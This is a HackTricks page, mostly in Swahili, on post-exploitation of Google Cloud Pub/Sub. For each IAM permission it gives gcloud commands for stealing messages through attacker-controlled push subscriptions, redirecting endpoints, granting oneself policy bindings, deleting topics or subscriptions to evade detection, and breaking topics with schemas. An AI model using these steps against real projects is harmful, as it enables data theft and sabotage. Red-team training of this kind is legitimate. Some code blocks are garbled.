GCP - Pub/Sub Post Exploitation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Pub/Sub

Kwa maelezo zaidi kuhusu Pub/Sub angalia ukurasa ufuatao:

GCP - Pub/Sub Enum

`pubsub.topics.publish`

Kuchapisha ujumbe kwenye topic, inafaa kwa kutuma data isiyotegemewa na kusababisha functionalities zisizotarajiwa au exploit vulnerabilities:

Chapisha ujumbe kwenye topic

```bash # Publish a message in a topic gcloud pubsub topics publish --message "Hello!" ```

`pubsub.topics.detachSubscription`

Inatumika kuzuia subscription isipokee ujumbe, labda ili kuepuka kugunduliwa.

Detach subscription from topic

```bash gcloud pubsub topics detach-subscription ```

`pubsub.topics.delete`

Inafaa kuzuia subscription kupokea messages, labda ili kuepuka kugunduliwa.
Inawezekana kufuta topic hata ikiwa subscriptions zimeambatishwa nayo.

Delete topic

```bash gcloud pubsub topics delete ```

Tumia ruhusa hii kubadilisha baadhi ya mipangilio ya topic ili kuisumbua, kama --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key…

`pubsub.topics.setIamPolicy`

Jipe ruhusa kufanya yoyote ya mashambulizi yaliyotajwa hapo juu.

# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
--member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
--role="<ROLE_OR_CUSTOM_ROLE>" \
--project="<PROJECT_ID>"

# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
<(echo '{
"bindings": [
{
"role": "<ROLE_OR_CUSTOM_ROLE>",
"members": [
"serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
]
}
]
}') \
--project=<PROJECT_ID>

`pubsub.subscriptions.create,``pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)

Pata ujumbe yote kwenye web server:

Unda push subscription ili kupokea ujumbe

```bash # Crete push subscription and recieve all the messages instantly in your web server gcloud pubsub subscriptions create --topic --push-endpoint https:// ```

Tengeneza subscription na uitumie pull messages:

Tengeneza pull subscription na upokee messages

```bash # This will retrive a non ACKed message (and won't ACK it) gcloud pubsub subscriptions create --topic

You also need pubsub.subscriptions.consume for this

gcloud pubsub subscriptions pull

This command will wait for a message to be posted

</details>

### `pubsub.subscriptions.delete`

**Futa usajili** inaweza kuwa muhimu kusababisha matatizo kwa mfumo wa usindikaji wa logi au kitu kinachofanana:

<details>

<summary>Futa usajili</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

`pubsub.subscriptions.update`

Tumia ruhusa hii kusasisha baadhi ya mipangilio ili ujumbe uhifadhiwe mahali unaweza kufikia (URL, Big Query table, Bucket) au tu kuuvuruga.

Mwisho wa kusasisha subscription

```bash gcloud pubsub subscriptions update --push-endpoint

```

`pubsub.subscriptions.setIamPolicy`

Jipa ruhusa zinazohitajika ili kutekeleza mojawapo ya mashambulizi yaliyotajwa hapo awali.

`pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)

Ambatisha schema kwenye topic ili ujumbe usiukidhi, na hivyo kusababisha topic kuvurugika.
Kama hakuna schema yoyote unaweza kuhitajika kuunda moja.

Unda faili ya schema na uiambatishe kwenye topic

```json:schema.json { "namespace": "com.example", "type": "record", "name": "Person", "fields": [ { "name": "name", "type": "string" }, { "name": "age", "type": "int" } ] } ```

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

`pubsub.schemas.delete`

Hii inaweza kuonekana kama kuondoa schema ili uweze kutuma ujumbe ambao hautatii schema. Hata hivyo, kwa kuwa schema itafutwa, ujumbe wowote hautaingia ndani ya topic. Kwa hivyo hii ni HAINA FAIDA:

Futa schema (hainufaiki)

```bash gcloud pubsub schemas delete ```

`pubsub.schemas.setIamPolicy`

Jipa ruhusa zinazohitajika ili kutekeleza yoyote ya mashambulizi yaliyotajwa hapo awali.

`pubsub.snapshots.create`, `pubsub.snapshots.seek`

Hii itaunda snapshot ya ujumbe wote ambao haujathibitishwa (unACKed) na kuwarudisha kwenye subscription. Si muhimu sana kwa mshambuliaji lakini hapa iko:

Tengeneza snapshot na ufanye seek

```bash gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \ --subscription=YOUR_SUBSCRIPTION_NAME gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \ --snapshot=YOUR_SNAPSHOT_NAME ```

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Angalia mpango wa usajili!

Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.

Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.